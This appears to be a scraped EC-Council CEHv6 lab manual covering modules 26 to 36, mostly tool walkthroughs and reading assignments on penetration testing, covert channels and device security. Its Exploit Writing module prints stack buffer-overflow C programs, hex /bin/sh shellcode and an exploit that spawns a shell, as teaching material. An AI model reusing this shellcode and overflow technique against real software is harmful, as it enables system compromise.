CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 633 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Module 26

Penetration Testing



Lab 26-01

Objective:

Use Azure Web Log to know details about your web traffic

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Install and Launch Azure Web Log

� Start a New Project from Project -> New. Enter the data and click Ok



� Start a New Log File from File -> Add Log



� Click Hits and Refs

� Click Site Info



� Click Current Month

� Click Previous Month



� Click Year Hits

� Click Hour



� Click System

� Country



Lab 26-02

Objective:

Use iInventory to capture hardware & software inventory and registry keys without having to leave your desk.


� Install and launch iInventory

� Click button Audit this PC in the left side pane. To start performance audit



� Performance Audit Report

� Click Scan Network button on the left side pane.



� Click Agent Builder Wizard on the left pane

� Set the options and click Next to forward to the next step

� Click Show Agent Config button on the left side pane

� Select an agent file from the list to display its summary





� Summary of agent configuration



Lab 26-03

Objective:

Use Link Utility to check links on Web sites and sustaining their efficiency.


� Install and launch Link Utility

� Click New Project button



� Click Import from HTML File. Select a file to import site addresses from. Click Ok



� Click Settings button to change the present options



� Click Scan button. Click Yes





� Click on the Report to generate the report file



Lab 26-04

Objective:

Use MaxCrypt to perform automated computer encryption.


� Install and launch MaxCrypt

� Click on New User to create a New User

� Now Login



� Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu

� Click on Manage Volumes



� Click on Create Volume button to create a new volume

� Enter the data and click Create Volume



� The New Volume F:\ is created



� Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu

� Click on Conceal Files



� Select a file and click Add button



� Finally Logout user

Lab 26-05

Objective:

Use Sniffem for monitoring network and capturing data traffic.


� Install and launch Sniffem





� Click Settings button to modify the present settings

� Click Capture button to start capturing the activities

� Click Stop button to stop capturing



Lab 26-06

Objective:

Use SQL Stripes to monitor and control your SQL Servers.


� Install and Launch SQL Stripes

� Click Yes



� Select Settings to modify the present options



� Select Server from the left side pane in the above window and click + symbol button in the right side pane to create a new server

� Enter details and click OK to create a new server



� Server 1 Created

� Check the Console



Lab 26-07

Objective:

Use TraceRoute Program to know the route over the network between two systems, listing of all the intermediate routers connected to its destination.


� Install and launch TraceRoute

� Input URL www.juggyboy.com in the Address bar. Click Trace



� Trace Result

� Repeat the same for other sites



Lab 26-08

Objective:

Use Windows Security Officer to restrict the resources for an application


� Install and Launch Windows Security Officer

� Initially click to change the administrator password



� Expand System 10 options in the left side pane

� Select Control Panel to modify the options



� Select Shell Restrictions to modify the options

� Select IE Browser Security to modify the options





� Select IE Cookies Viewer to modify the options

� Select Log User Activity to modify the options



� Select Restrict User Work Time to modify the options

� Select Folder Guard to modify the options



Lab 26-09


� Open the Penetration Testing.pdf and read the content Develop a penetration test plan



�

Lab 26-10


� Open the Software Penetration Testing.pdf and read the content Penetration testing today



�

Module 27

Covert Hacking



Lab 27-01


� Open the Covert Channel Analysis and Data Hiding in TCPIP.pdf and read the content Covert Channels



Lab 27-02


� Open the Bypassing Firewall.pdf and read the content Firewall Piercing (Inside-Out Attacks)

� In the same PDF file, read the Examples of Covert Channel Attacks topic



Lab 27-03


� Open the Covert Actions.pdf and read the content Covert channels are the principle enablers in a DDoS attack



�

Lab 27-04


� Open the Covert channel vulnerabilities in anonymity systems.pdf and read the content Covert channels



Module 30

Exploit Writing



Lab 30-01


� Boot your computer using the BackTrack CD-ROM

� Open command shell and type: kedit example1.c

� Type the following in kedi:

void function(int a, int b, int c) {

char buffer1[5];

char buffer2[10];

}

void main() {

function(1,2,3);

}



� Save the program in kedit.

� Compile the program by typing: $ gcc -S -o example1.s example1.c



� View the generated assembly file by typing: kedit example1.s



Lab 30-02

example2.c


� Create another program in kedit.

Kedit example2.c

� Type the following:

void function(char *str) {

char buffer[16];

strcpy(buffer,str);

}

void main() {

char large_string[256];

int i;

for( i = 0; i < 255; i++)

large_string[i] = 'A';

function(large_string);

}



� Save the program in kedit.



� Compile the program by typing: $ gcc -o example2.s example2.c



� Run the program by typing: ./example2.s



� You should see a segmentation fault error



� View the generated assembly file by typing: kedit example2.asm



Lab 30-03

Objective:

example3.c


� Create another program in kedit. Kedit example3.c

� Type the following: void function(int a, int b, int c) {

char buffer1[5];

char buffer2[10];

int *ret;

ret = buffer1 + 12;

(*ret) += 8;

}

void main() {

int x;

x = 0;

function(1,2,3);

x = 1;

printf("%d\n",x);

}



� Save the program and compile it by typing: $gcc –o example3 example3.c



� Run the program by typing: $./example3



� It should print one

� Disassemble main using gdb

� Type the following: $gdb example3



� Type: disassemble main





Lab 30-04

Objective:

shellcode.c


� Create another program in kedit

Kedit shellcode.c

Type the following: #include <stdio.h>

void main() {

char *name[2];

name[0] = "/bin/sh";

name[1] = NULL;

execve(name[0], name, NULL);

}



� Compile the program by typing: $ gcc -o shellcode -ggdb -static shellcode.c



� Type: $ gdb shellcode

� Then, type disassemble main.



� Type disassemble _execve





Lab 30-05

Objective:

exit.c


� Create another program in kedit. Kedit exit.c

Type the following: #include <stdlib.h>

void main() {

exit(0);

}

� Compile the program using: $ gcc -o exit -static exit.c

� View the generated code gdb by typing: gdb exit

� Then:

disassemble _exit



Lab 30-06

Objective:

testsc.c


� Create another program in kedit.

Kedit testsc.c


char shellcode[] =

"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"

"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"

"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"

"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {

int *ret;

ret = (int *)&ret + 2;

(*ret) = (int)shellcode;

}

� Compile the program using: $ gcc -o testsc testsc.c

� Run the program by typing:

./testsc

� You should see a shell launched.

� Type exit to exit the shell.



Lab 30-07

Objective:

exploit.c


� Create another program in kedit Kedit exploit.c


char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() {

char buffer[96];

int i;

long *long_ptr = (long *) large_string;

for (i = 0; i < 32; i++)

*(long_ptr + i) = (int) buffer;

for (i = 0; i < strlen(shellcode); i++)

large_string[i] = shellcode[i];

strcpy(buffer,large_string);

}

� Compile the program using: $ gcc -o exploit exploit.c

� Run the program by typing:

./exploit

� You should see a shell launched

Type exit to exit the shell



Module 34

Mac OS X Hacking



Lab 34-01


� Open the Securing Mac OS X.pdf and read the content

� Read the Security Hardening Guideline topic



� In the same PDF file, read the Data Encryption topic



Lab 34-02


� Open the Security in Mac OS X.pdf and read the content

� Read the Secure Default Settings topic



� In the same PDF file, read the Modern Security Architecture topic



� Next, read the Strong Authentication topic



Lab 34-03


� Open the Mac OS X 10.4 Security Checklist.pdf and read the content

� Read the OS X Security Architecture topic



� In the same PDF file, read the User Account Security topic



� Next, read the Securing System Preferences topic



Lab 34-04


� Open the Mac OS X Hacking Poses Wide Risk to Windows.pdf and read the content

� Read the Mac OS X Hacking Poses Wide Risk… for Windows topic



Module 35

Hacking Routers, Cable Modems, and Firewalls



Lab 35-01


� Open the Chapter 9-Firewalls.pdf and read the content

� Read the FIREWALL IDENTIFICATION topic



� Next, read the PACKET FILTERING topic



Lab 35-02


� Open the CISCO ROUTERS AS TARGETS.pdf and read the content

� Read the Compromised Router Sniffing topic



� In the same PDF file, read the Why we need to protect router resources topic

� Next, read the Router Audit Tool topic



Lab 35-03


� Open the Cisco Router Security Best Practices.pdf and read the content

� Read the Access management topic



� In the same PDF file, read the SNTP Security topic



� Next, read the Access control lists topic



Lab 35-04


� Open the 8 steps to protect your Cisco router.pdf and read the content



� In the same PDF file, read the Encrypt all passwords topic



Module 36

Hacking Mobile Phones, PDA, and Handheld Devices



Lab 36-01


� Open the Take Control of Your iPhone.pdf and read the content

� Read the QUICK START TO TAKING CONTROL OF AN iPHONE topic



� In the same PDF file, read the 8 QUICK TROUBLESHOOTING STEPS topic



� Next, read the AVOID NAVIGATION AND TYPING HASSLES topic



Lab 36-02


� Open the iphone Hardware Unlock.pdf and read the content



Lab 36-03


� Open the How to Unlock an iPhone.pdf and read the content



Lab 36-04


� Open the The Anatomy of a Hack.pdf and read the content.

� Read the Understanding the Threats to Your Mobile Workforce topic



� In the same PDF file, read the Anatomy of a Hack Video Companion Guide topic



Lab 36-05


� Open the Mobile Handset Security.pdf and read the content

� Read the Security issues on mobile devices topic



� In the same PDF file, read the Threats and Attacks topic



Lab 36-06


� Open the Mobile Malware Threats and Prevention.pdf and read the content

Documents

CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf